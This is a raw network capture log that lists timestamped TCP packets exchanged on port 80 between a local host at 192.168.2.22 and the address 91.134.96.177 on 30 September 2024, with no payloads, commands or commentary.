                                                                                                                                                                                                Sep 30, 2024 16:24:36.270309925 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270318985 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270330906 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270351887 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270359993 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270361900 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270373106 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270381927 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270385027 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270395994 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270410061 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.270431995 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.275211096 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.275222063 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.275232077 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.275276899 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357219934 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357249022 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357265949 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357319117 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357357979 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357388973 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357429028 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357635021 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357835054 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357877016 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357887983 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357923031 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357979059 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.357990026 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358051062 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358771086 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358835936 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358846903 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358881950 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358961105 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.358971119 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359000921 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359469891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359479904 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359492064 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359525919 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359690905 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359703064 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.359735012 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.363377094 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.416840076 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.416858912 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.416871071 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.416940928 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444118977 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444191933 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444221020 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444269896 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444272995 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444318056 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444331884 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444351912 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444405079 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.444447041 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445039034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445072889 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445105076 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445113897 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445473909 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445507050 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445538998 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445545912 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445590019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445622921 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.445666075 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446336031 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446383953 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446415901 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446448088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446468115 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.446480036 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447170019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447202921 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447217941 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447252035 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447283030 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447314978 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.447321892 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448093891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448143959 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448175907 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448191881 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448208094 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448240995 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448283911 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448920965 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.448967934 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.449001074 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.449042082 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.449048996 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.449136019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.450408936 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490525961 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490559101 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490570068 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490624905 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490734100 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490745068 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490756035 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490778923 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490791082 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490802050 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.490830898 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.491450071 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.491492987 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.491539955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.491580963 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.491662979 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503793955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503848076 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503885984 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503952980 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503963947 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503974915 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503987074 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.503997087 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.504020929 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531424999 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531440973 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531451941 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531487942 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531548023 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531558990 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531574011 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531583071 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531588078 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531599998 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531683922 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531709909 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.531867981 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532351017 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532361984 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532371998 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532382011 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532394886 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532412052 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532836914 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532847881 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532883883 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.532994032 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533005953 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533015966 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533036947 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533130884 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533143044 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533169985 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533843994 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533854961 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533865929 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.533890009 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534009933 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534022093 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534033060 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534043074 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534044981 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534065008 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534871101 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534882069 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534890890 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534902096 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534913063 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534921885 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534936905 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534944057 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.534955978 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535701990 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535720110 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535731077 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535741091 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535752058 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535757065 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535768986 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535851955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535867929 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.535903931 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536638975 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536648989 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536659956 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536670923 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536680937 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536681890 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536690950 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536701918 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536703110 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.536716938 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537399054 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537410021 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537420034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537430048 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537456036 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.537470102 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.538678885 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.564450979 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.564604044 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.564614058 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.564661980 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.564742088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577349901 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577363014 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577373981 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577418089 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577416897 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577433109 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577456951 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577533007 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577548981 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577560902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577578068 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577593088 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577625990 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577636957 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577646971 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577657938 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577666998 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577667952 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.577687979 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578098059 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578114986 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578125000 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578159094 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578318119 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578362942 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578372955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578408003 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578567028 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578627110 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578639030 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.578675032 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591667891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591677904 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591687918 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591700077 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591710091 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591720104 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591720104 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591731071 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591747999 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591747999 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591798067 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591806889 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591819048 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591829062 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591837883 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591839075 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.591854095 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618366957 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618377924 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618388891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618426085 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618506908 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618519068 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618530989 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618561983 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618801117 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618812084 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618841887 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618947029 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618959904 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618982077 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618983030 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.618993044 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619015932 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619302034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619318962 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619330883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619340897 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619343042 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619353056 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619364977 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619415045 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619450092 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619462013 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619472027 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619482040 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.619503021 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.620480061 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.620646000 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.620682001 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.620822906 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.621004105 CEST804917391.134.96.177192.168.2.22
